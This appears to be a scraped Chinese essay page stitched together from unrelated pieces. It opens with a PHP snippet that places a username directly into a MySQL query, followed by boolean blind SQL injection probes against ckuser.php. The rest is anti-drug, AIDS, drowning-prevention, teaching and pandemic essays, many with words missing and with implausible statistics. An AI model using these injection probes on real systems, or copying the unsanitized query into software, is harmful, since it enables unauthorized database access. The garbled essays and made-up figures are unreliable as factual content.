$con = @mysql_connect(”$dbserver“,”$dbuser“,”$dbpass“ )or die(ERR_DB);

mysql_select_db(”$dbname“,$con)or die(”can not choose the dbname!“);

$query=”select * from “.$BIAOTOU.”user where ddusername='“.$uname.”'“;

mysql_query(”set names utf8“);

$res=mysql_query($query);

if(mysql_num_rows($res)!=0)

{echo ”true“;}

else

{echo ”false“;}

}

首先注册一个用户.让程序能过判断

ckuser.php?name=maxadd' and 1=1 and ''='

返回true

ckuser.php?name=maxadd' and 1=2 and ''='

返回false

篇9：学习禁毒防艾总结精选

20xx年6月26日国际禁毒日马上就要到了，为了使我校更好地开展禁毒、防艾健康教育，提高预防教育的效果，我校利用班会课开展禁毒防艾、珍爱生命主题班会教育活动并让同学们写下了有关禁毒防艾心得体会。

以下是同学们写的禁毒防艾心得体会具体内容：

现实中，青少年吸毒已成为一个触目惊心的严重问题。来自国家禁毒委员会办公室的数字表明，我国最近几年青少年吸毒的比例始终在吸毒人口中占80%左右。据不完全统计，16岁以下的少年吸毒人数有所增加，青少年已成为最易受到侵害的高危人群。

目前，学校预防教育工作在认识上还存在着一些误区：一是怕学生知道。认为禁毒教育会引发学生的好奇心，促使他们冒险尝试;二是认为禁毒教育是公安部门的事，与学校无关。这些认识误区的一个前提，就是目前在校学生吸毒者罕见。事实上，蔓延的速度相当快，若等到在校园时再来教育，则为时已晚。由此可见加强禁毒教育，做好超前预防工作，是解决青少年吸毒问题的根本途径和出路。

我认为应该加强教育，增强青少年拒毒防毒能力。具体做法如下：

1、大力宣传，营造良好的禁毒氛围。

(1)多层面、多渠道开展宣传教育活动。学校领导、工会、少先队可以充分利用广播、校园网、宣传栏、开展远离为主题的手抄报比赛、主题班队会、演讲、征文等形式宣传的种类、性能、危害以及远离的方法和知识，使100%的中小学生都能深刻认识犯罪的社会危害性，自觉抵制、远离，从而使广大青少年自觉增强防毒的意识和决心。

(2)加强法制宣传教育。学校的法制教育可分为两个层次，第一个层次，即从生活知识、生活规则、生活礼节这样一些初级生活准则的教育入手，来培养青少年的法律意识的基矗这也是青少年自我防范的最重要的第一步。青少年吸毒犯罪，并非都是有意要藐视法律，而主要是缺乏生活准则的修养，不能对自己的行为做出合乎生活准则的判断。第二层次，是加强青少年生活准则和社会公共道德的修养的教育。这是增强青少年法律意识的关键，也是青少年自我防范的一道最直接的屏障。许多青少年在这方面的修养，大大低于他们的文化知识水平。如果我们的学生不懂得和不遵守社会生活准则，没有和缺乏社会的公德修养，就会在客观行为上出现偏差。

学校将通过思想政治课中的法制教育、法律知识竞赛、通过请区公安分局负责禁毒教育的警官到学校做报告，以案例分析的形式让学生了解的危害等形式增强学生的法制意识，提高自我保护能力。以自我互动教育、体验教育、亲子双向教育、集中授课等形式，帮助青少年在实践中掌握法律知识，在体验中增强法制观念。如果条件允许可以通过建立法律服务设施，开展经常性的法律咨询，为青少年提供及时有效的法律服务。

2、充分发挥课堂教学的主渠道作用，不断增强中小学生预防教育的科学性、针对性和实效性。针对不同年龄段青少年的不同特点，开展有所侧重、分层次的禁毒教育活动，使学生了解的危害、预防的基本知识及禁毒政策与法律法规，掌握拒绝的方法与技能，养成健康、文明的生活方式。坚持从小抓，重在防，确立珍爱生命，远离的意识。

在普遍开展预防教育的同时，把四五六年级学生作为预防主题教育的重点。结合实际，采取切实有效措施，不断探索适合于他们生理特点的教育方式和方法。以典型带动全局，并运用解剖麻雀的方法，不断探求规律特点，推动学校预防教育工作。

3、加强心理健康教育。心理健康教育不但能帮助少数学生解决心理问题，而且能提高学生的心理健康水平，培养学生的健康人格。

学校心理辅导老师、卫生老师结合青春期专题讲座等形式，分析吸毒对青少年的身心影响，在全校范围内进行预防宣传教育活动。例如可以介绍什么是?日益严重的问题吸毒的危害等从医学角度，生理学角度使学生们认识到与吸毒、贩毒这一触犯刑律的错误行为作斗争是我们每一个青少年学生的责任和义务。

篇10：学习禁毒防艾总结精选

和艾滋病已成为一个人人熟知的词汇，“”，一个可怕的名词，只要一不小心就会落入它的魔掌。多少鲜活的生命，被它妖艳的外表所诱惑，从此踏上了一条不归路。这是一条充满了精神和肉体的痛苦，充满了妻离子散的痛苦之路;而艾滋病的传播和流行不仅严重影响广大人民的身体健康，对中国经济和社会也造成了严重的危害。艾滋病的全称为“获得性免疫缺陷综合症”，当人体处于正常状态时，体内免疫系统可以有效抵抗各种病毒的袭击。

一旦艾滋病病毒侵入人体体内，这种良好的防御体系便会土崩瓦解，各种病毒乘机通过血液、破损伤口长驱直入。通俗地讲，艾滋病病毒是通过破坏人的免疫系统和机体抵抗能力，而给人以致命的打击。虽然全世界众多医学研究人员付出了巨大的努力，但至今尚未研制出根治艾滋病的特效药物，也没有可用于预防的有效疫苗。目前，病死率几乎高达100%的艾滋病已被我国列入乙类法定传染病，并被列为国境卫生监测传染病之一.故此我们把其称为“超级绝症”。

这二者又有什么联系呢?作用于人体，使人体体能产生适应性改变，形成在药物作用下的新的平衡状态。一旦停掉药物，生理功能就会发生紊乱，出现一系列严重反应，称为戒断反应，使人感到非常痛苦。用药者为了避免戒断反应，就必须定时用药，并且不断加大剂量，使吸毒者终日离不开。吸毒者喜欢肌肉或皮下静脉注射，而这些注射用的针头往往存有艾滋病毒，这便成为了艾滋病传播的一个重要途径：血液传播!研究表明，61.219%艾滋病患者都正在吸毒或曾经吸过毒，而吸过毒的人98.326%都感染上艾滋病。可以说，吸毒必定让人感染艾滋病，艾滋病必定让人家破人亡!

作为一名中学生，也作为社会这个大家庭中的一员，我有义务、有能力做好禁毒防艾工作，坚决做到不吸烟，不喝酒，养成良好的生活习惯;在学校，协助老师、同学宣传禁毒防艾知识，共撑起我们美好的明天。

“禁毒防艾，远离，关爱未来”，这不仅仅是一句简单的口号，更像是一口警钟。时时刻刻在你的耳边响起。提醒你那些五颜六色药丸后的隐患，帮助你重新认识自己的生命。朋友们，愿这些文字永远在你们心中回荡，把永远杜绝在我们真善美的大门外，为我们的理想而奋斗!

篇11：学习禁毒防艾总结精选

在响应省委的”打一场禁毒防艾战争“的号召下，州委、州和县委、县的安排布署下，芒蚌村禁毒和防治艾滋病工作在镇党委、的下，以十七大精神、和思想为，州、县、镇禁毒防艾工作会议精神，法律法规的宣传、学习和工作，对禁毒和防治艾滋病工作的，思想不松、不减、格局不变，禁毒防艾战争。现将全年的禁毒防艾工作情况总结如下：

情况

驻地东北3.5公里，海拔890米，辖区共9个自然村，11个村民。全村共有605户，2638人。全村总耕地面积5119亩，水田3468亩，旱地1651亩。全村人均有粮729公斤，人均收入1766.：男31人，女4人)，现有吸毒人员4人(：男3人，女1人)，弄岭2人，硝塘1人，户引1人;艾滋病感染/病人9例(含死亡1例)，均为性传播感染。的主要工作，抓好了禁毒防艾工作，村两委对禁毒防艾作，纳入议事日程。禁毒和防艾工作关系到社会稳定、安康，关系到社会的可持续发展。为禁毒防艾工作的，由村支部书记担任禁毒防艾责任人，由副支书、副主任和驻村工作队员协助，并对全村的禁毒防艾工作安排部署，健全并各禁毒防艾工作责任制，签订了责任书。了全村禁毒防艾工作的并了的。干群的禁防意识禁毒防艾的法律法规的宣传，营造禁毒防艾工作的，是禁毒防艾斗争的一项基础性工作，有利于地禁毒防艾工作宣传教育。

把禁毒防艾的法律法规作”五五“普法工作的内容，充实禁毒防艾的宣传教育队伍;以法制宣传活动、创办法治宣传栏等多种普法和禁毒防艾培训宣传，禁防工作队伍的建设。把禁毒防艾宣传教育工作纳入精神文明建设的内容。共青团、学校、妇女之家、民兵之家等组成了强大的宣传队伍，有计划、有、有组织地宣传教育工作，使全社会禁毒防艾意识，基层组织和禁毒斗争的性、性，大大了、学生的拒毒、防毒、反毒、防艾的意识。

禁毒防艾工作的”四禁并举、堵源截流、执法、综合治理“的方针，多方联合、齐抓共管，使全村禁毒防艾工作落到了实处。联合乡计生办对全村已婚育龄妇女的生殖检查和避孕工作宣传，已婚育龄妇女的生殖健康，艾滋病的预防与控制工作。各村民把禁毒防艾工作纳入村规民约管理，由村支部书记担任禁毒责任人，抓好本村的禁毒防艾工作。

学校教育阵地建设，让禁毒防艾宣传春风吹进学校。为学校预防教育工作,学生自觉抵制的能力，使禁毒防艾知识进学校、入课堂。，在学校内多种的宣传教育活动。

外出务工人员的禁防意识。经常走访外出务工人员家属，宣传、艾滋病的危害及预防等知识，教育家属外出务工人员对和艾滋病危害性的认识，宣传面不留死角的问题。

仍要放松。禁防工作的，对和艾滋病的，但不愿意禁毒防艾工作，只要是健康的，禁毒和防艾工作是党委、和职能的事。是艾滋病自愿检查工作难以，社会上对艾滋病人感染者仍有歧视、排斥。

综合防治的设备、设施。

自发外出务工人员，条件限制，仍然未禁毒防艾知识培训。

村财政较为，经费有限，制约了禁防工作的。

禁毒防艾工作，与的通力协作。认清,是当今世界的头号公害，艾滋病是21世纪的绝症瘟疫。禁毒防艾工作的紧迫感和责任感，的联动与协作，动员全社会，齐抓共管，同心协力，健全和主导、多合作、全社会的禁防工作机制。

青少年的宣传教育工作。宣传教育工作，对青少年”面对面“宣传教育，”小手牵大手“活动，使青少年在禁毒防艾工作主导作用。

健全禁防长效机制。以禁防为主要内容的村规民约，保障其有较强的可操作性;健全禁防组织，使组织在今后工作中最前哨的作用。

共青团、学校、妇女之家、民兵之家的作用，宣传，营造，动员全社会，齐抓共管，同心协力，健全和村委主导、多组织合作、全社会的禁毒防艾防控机制。

艾滋病综合防治工作。艾滋病监测工作，实施干预工程，强化干预措施，”四免一关怀“政策的下，在各的通力协作下，在全社会的努力下，芒蚌村将一手抓禁毒，一手抓防艾，两手都不松。以”芒蚌"为稳步向前进。

篇12：同上一堂防溺水课学习总结

江河湖泊往往装出一副平静的样子，温柔的样子，让人忽视了温柔的背后是多么深的地狱。有多少人落入了这无底的漩涡、这可怕的魔爪。身边，也许这些沉重的画面可常而见，就在我们身边，悲剧正在上演着。4月15日，石台县中学一名高一学生与同伴擅自下河游泳，溺水身亡。6月3日郎溪县一名初一学生不听劝阻，私自下塘游泳，溺水身亡。5月29日，浙江省青田县侨乡一名初二学生到江游泳，溺水身亡。

听了这么多的新闻，大家肯定会感觉到生命的重要性吧!其实，生命很容易保护，也很容易丢失，只要稍有不慎，就会丢掉。不过只要我们有预防溺水的常识，就不用再提心吊胆了：

第一：不能在任何不知名的水库，江、河、池塘海里游泳。第二：游泳时，要有大人的陪伴，绝对不能独自下河游泳。第三：不能在江、河、海里玩闹、戏耍。第四：下水前要做准备活动。可以跑跑步、做做操，活动开身体，还应当用少量冷水冲洗一下躯干和四肢，这样可以使身体尽快适应水温，避免出现头晕、心慌、抽筋等现象。第五：游泳需要经过体格检查。患有心脏病、高血压、肺结核、中耳炎、皮肤病、严重沙眼等以及各种传染病的人不宜游泳。还有处在月经期的女同学也不宜去游泳。

生活中世事难料，我们要好好把握自己的生命，对自己的生命负责，不能因为一时的大意而让自己身处险境。看着身边一个个生命就这样在世界上消失，请记住这一个个教训。

珍惜生命，预防溺水，这八个大字，我们一定要紧紧地铭记在心，珍惜每一个人的生命。

篇13：2022同上一堂防溺水课学习总结

望着江边刚刚做好的码头，我们心血来潮，竟偷偷走了下去。翻开一块块河里的石头，看到有许多小螃蟹在逃。直逗得我们两人心里痒痒的，蹲下身来伸手去捉;不知不觉离岸边越来越远。湍急清冽的河水让我们忘却了这里每年都有淹死人的记录，学校的规定，父母的叮咛皆抛到九霄云外去了，我们在水里尽兴的嬉戏。

突然，感到裤裆一湿，不好?涨潮了!望着四周突然而来的潮水，吓得我们尿都流了出来，并且大声呼救。时间过去了多久，我无从知道。突然间，我看到岸上远远奔过来一个身影，那匆匆的脚步及不断往耳后掖头发的动作，我判定是妈妈。可能是妈妈见我们到江边玩，许久不回家来，竟寻到江边上来了;看到眼前的一幕，深懂水性的妈妈，转眼间就趟过齐腰深的河水来到我和小刚的身边。说：“孩子别怕!把手伸向我。妈妈的声音轻柔中带着颤抖，“妈妈……”我把妈妈的手握得紧紧的，妈妈看着我，慈爱地微笑着。她用肩膀把我扛回到岸边又去背小刚过来。

生命无价，脆弱短暂。一次车祸，一次溺水，都会使人失去生命，经过这次教训，使我懂得热爱生活，珍惜生命，生命，是无价之宝，安全，我们从小听到大，可又不会有谁真正注意到它呢?现在，回想起那天江边遇险的一幕幕，我有了很深的感触。青少年死于溺水的人也很多，我们不能在没有成人在场的情况下游泳，更不能在江河畔嬉戏打闹。

人生中有许多重复，惟独生命只能经历一次，我们要珍惜这次机会，珍惜生命。我们的生命有许多人关爱着，呵护着，尤其是我们的父母;如果我们的生命结束了，他们会不伤心吗?为了他们，为了我们，大家要注意安全，珍惜生命，关爱明天，让世间的各个角落都充满爱，充满笑声。

篇14：2022同上一堂防溺水课学习总结

在北海，每年都有人因溺水而死亡。上个月，就有一外地游客自认为自己游泳很厉害，他拿带着游泳圈在西南浪很大的时候下海游泳。在下午的时候，与他同行的朋友，便打了求救电话，说他去游泳了很久都没有回来，海上救援队派出了快艇、直升机出去搜救，但生死未卜。这是多么可怕的事情啊!夏天去游泳，虽然是一件好玩又凉快的事情，但是如果不做好防护措施，不在安全区域游泳就很容易发生意外。

所以我们需要熟背防溺水六不准。第一，不准私自下水游泳;第二，不准擅自与他人结伴游泳;第三，不准在无家长或老师带队情况下游泳;第四，不准到不熟悉的水域游泳;第五，不准到无安全设施无救护人员水域游泳;第六，不准不会水性的学生擅自下水施救。

近日，有一则新闻说，有一个孩子在室内游泳馆游泳，但是家长一直在看手机，没有注意到孩子在水里的异常举动，见他手脚乱扑，旁边的大人小孩以为他正在玩水，便没有人理会，其实他已经发生溺水，是在挣扎。最后发现时，孩子已溺水身亡。这是一个多么惨痛的事情。

我们每一个人都离不开水，但是我们要注意，防溺水事故的发生。家里面的浴缸，工地泥塘。家里的虾塘，鱼塘都有可能会发生溺水事故。溺水事故随时都有可能发生在我们身边。

篇15：2022同上一堂防溺水课学习总结

生命是宝贵的，也是自己的，不能够这么的轻易的去违反学校的规章制度，不能够私自下河，回到家中也一定要控制住自己，多多了解这方面的知识，像这种淋水的情况，在我们的生活周围一直都很多，真的例子已经不是一次两次了，新闻上面也经常报道，自己也在生活当中能够听到别人讲到，所以说同学们，我们一定要重视起来，提高自己的警惕性，一定不能够忽视溺水。

现在夏天到了，天气虽然很热，可是我们不能够放松自己，也不能够有一些不应该有的想法，下河洗澡非常的危险，在这个时候通常都是，最放松的时候，也容易放下自己的戒心，我们千万不能有这的想法，千万不能任由这样的事情发展下去，一定要做好相关的防护工作，不能够在学习生活当中让自己处在一个很为难的境地，搞好学习才是最应该的。一定要把自己的注意力转移到别的地方，千万不能够看到河里面有一些人在洗澡，自己就私自下去凑个热闹，往往这个时候就危险到了，同学们，我们放学回家的路上，可能会遇到这样的情况，大家一定要提高自己的警戒，心也要多多了解一下关于溺水方面的知识，遇到这种情况应该如何自救?应该如何去解决?这都是一种方式，所以我们要多多了解，千万不能够有这样的情况发生。

但是我们要做好这方面的防护工作，也要了解到这些知识，这是跟大家来说这些，也是为了安全的度过这个夏天，包括在放暑假的时候，也是如此，大家把的时间在家里，可能会感觉很无聊，也可能会出去游玩累了，热了就可能会松懈下河洗澡，所以我们一定要在这里打好预防针，一定要让自己知道这其中的厉害关系，所以说我们现阶段必须要清楚这一点，严格预防溺水事件发生。

篇16：让学习成为一种快乐 教学总结(二年级上册)

三泉小学   王  兰

一年级新课程的内容多、知识面广，但又是打基础和培养良好习惯的关键时候，而学生活泼好动、自我控制能力较差，对大量枯燥的练习不感兴趣，容易产生厌倦心理，教学中如果把握不好，有可能使学生获得的知识显得很零碎，不扎实。所以我总是想方设法带领学生轻松学习,让学生感觉学习是一种快乐。

一、趣味识字，提高学生的识字能力

本学期要求学生认识550个字，会写250个字。在教学中我把生字教学放在最重要的位置，生字教学是每堂课的教学重点，同时我又遵循认写分步，多认少写的原则。对于要求会认的生字，我引导学生找到识字方法，以便能快速地识记。现在学生已经掌握了许多好的识字方法。我在教学的时候有意让学生利用熟字加一加，换一换，猜谜语等方法，让枯燥的识字教学变得有趣味。并且学习的时候我让学生自己根据不同的生字选用不同的识字方法。学生识记生字后，我会采用不同的形式，让生字复现在学生眼前。如：教学生字“清、晴、睛、情、请”时，我首先出现学过的生字“青”然后就是加一加，接着换一换，然后再出现顺口溜“有水河水清，有日天气晴，有目大眼睛，有言说声请，有心好心情”，这样一来，学生学起字来容易，掌握区分也容易。又如：教学“光”时我让学生猜迷语：“小字不像小，端根登子坐到，一只脚伸直，一只脚弯起”，学生在猜字的愉快中学会了“光”字，并且记忆深刻。在学习生字后，我还想尽一切办法让生字重复出现，让学生对生字能牢牢记住。比如在学了一些字后，我会故意出现一些以前学过的形近字，让学生在对比中记住了生字。

二、找到自信，让学生写好生字

学生在记住生字的同时一部分生字要求正确书写，在书写的时候我让学生先观察，在写一写，在学生的书写当中我心量根据学生的要求，在给他写得好的地方画上笑脸或笑苹果，当然学生看到笑脸或笑苹果的时候，脸上绽开了自信的笑容，于是他有信心写好后的字了。后来逐步让学生自己觉得写好了就给自己画上喜欢的笑苹果或笑脸，他们往往为了得到笑苹果或笑脸，会自觉把生字写好。

三、情感朗读，提高感悟能力，

小学语文课本中的每一篇课文都是文质兼美的佳作，其语境描述的美妙，语言运用的精妙，思想表达的深邃，见解阐述的独到，都是引导学生感悟的重要内容。而由于课堂教学时间的有限，课文中的精彩之处没有可能引导学生一一感悟。为了使这些精彩给学生留下整体印象，我们可以在阅读中抓重点，引导学生对语言文字反复诵读，以悟出语言丰富的形象内涵，意义内涵，情感内涵。如：在教学课文《瓜娃娃打电话》时，为了让学生体会瓜娃对母亲的美好情感，激发学生爱母亲、爱亲人的情感。我引导学生充满感情读瓜娃娃对妈妈说的几句话，并且要求在朗读时，学生大声的深情的喊出“妈妈”，当时我发现孩子们的情感被激发出来的。当我问到你准备怎样爱自己的亲人时，孩子们一下子都打开了话闸子，对亲人他们有说不完的话，很自然地提高了对课文的感悟能力。

四、演课本剧，让学生理解课文

一年级的很多文章都充满了趣味，在教学中，为了让学生能更好地理解课文，也为了让学生在理解课文时轻松愉快，我经常让学生把课文内容演一演。如：在教学《青蛙搬家》时，我就让孩子们把课文内容演出来，由于孩子们天真烂漫，演起来无拘无束，大家在笑声中，担心青蛙的命运，也在笑声中明白了做人的道理。

总之，我觉得要让学生学好语文，首先是要让学生能够快乐地学，学得轻松。当然要让学生学得轻松，需要老师做出大量的努力：培养学生的学习兴趣，教会学生学习，想方设法改变教学方法，设计有趣的学习活动等等。这样才能够让孩子们认认真真地学习，让快乐伴随着学习，在学习中体会真正的快乐。

[让学习成为一种快乐 教学总结(二年级上册)]

篇17：学习疫情防控思政大课心得总结

2月3日，中共中央政治局委员、中组部部长陈希在“组织部门坚决贯彻落实习近平总书记为核心的党中央关于打赢疫情防控阻击战重要指示精神和党中央决策部署，积极主动履职、有效发挥作用”电视电话会议上强调，各级领导干部要“危难时刻挺身而出、英勇奋斗，把疫情防控斗争的各项部署落细落实落到位”。疾风识劲草，烈火见真金，打赢防疫阻击战，党员领导干部是“关键少数”，必须关键时刻站得起来，危难关头豁得出去，在战疫一线谱写“血与火”的时代之歌。

在战疫一线检验初心和使命。中国共产党人的初心和使命，就是为中国人民谋幸福，为中华民族谋复兴。当前，疫情防控形势严峻，感染人数继续攀升，在这场没有硝烟的战争中，已有多人失去了宝贵的生命。遏制疫情蔓延的势头，在充分发挥医务人员专业能力的基础上，还需各级领导干部提高社会治理能力和水平，严防严控、严格排查，阻断传染源，同时做好民生领域的其他工作。因此，领导干部要有“壮

士断腕，背水一战”的勇气和魄力，在普通群众隔离在家的时候，“逆行”战疫一线，靠前决策，靠前指挥，挑最重的担子，啃最硬的骨头，着力解决时下人民群众最关心、最直接的难点、痛点、堵点问题，坚决维护好人民群众的生命安全、身体健康和现实利益。

在战疫一线感悟责任与荣耀。入党誓词中写道，“随时准备为党和人民牺牲一切”，“我是党员，我先上”彰显的不仅是勇气与担当，更是责任与荣耀。“为官避事平生耻”，疫情防控面前，各级领导干部既要守土有责、守土负责、守土尽责，更要在危难时刻敢于站出来、

跳出来，不顾生死，义无反顾，共赴时艰。向疫情宣战，集结号已经吹响，党员领导干部是群众的“主心骨”和“定盘星”，“人民看党员、党员看干部”，关键时刻就要挺身而出，冲锋在前，积极走好群众路线，带领广大人民群众坚定必胜的信心和决心，众志成城，戮力同心，把打赢疫情防控阻击战作为时代的责任与担当，舍我其谁，舍生取义，努力向党和人民交上满意的答卷。

在战疫一线锤炼党性和信念。在疫情防控这场没有硝烟的战争中，党员领导干部需直面生死，能否经受住考验，是党性信念是否坚定的“试金石”。共产党员，就是要随时准备为党和人民牺牲一切，“抗疫前线党员先上”“不计报酬、不论生死”，如果没有强大的党性信念支撑，又怎能直面生死依然无畏。坚定的党性信念不是自然而生的，而是要经过严格意义上的党性历练才能产生，疫情防控是当前最紧迫的政治任务，也是锤炼各级党员领导干部党性意识的“主阵地”，要自觉在战疫一线强信念之“筋”，健理想之“骨”，推动全党上下统一思想、统一意志、统一行动，发扬斗争精神，勇于担当作为，坚决打赢疫情防控阻击战。

★ 几种通用防注入程序绕过方法脚本安全

★ 劫持正在运行进程的EIP注入代码的方法

★ 防溺水课学习总结

★ 常备的注入命令总结

★ 《将心注入》读书心得总结

★ 防溺水学习心得体会

★ 学习疫情防控

★ 玩儿,也是一种学习作文

★ 学习就是一种享受作文

★ 学习总结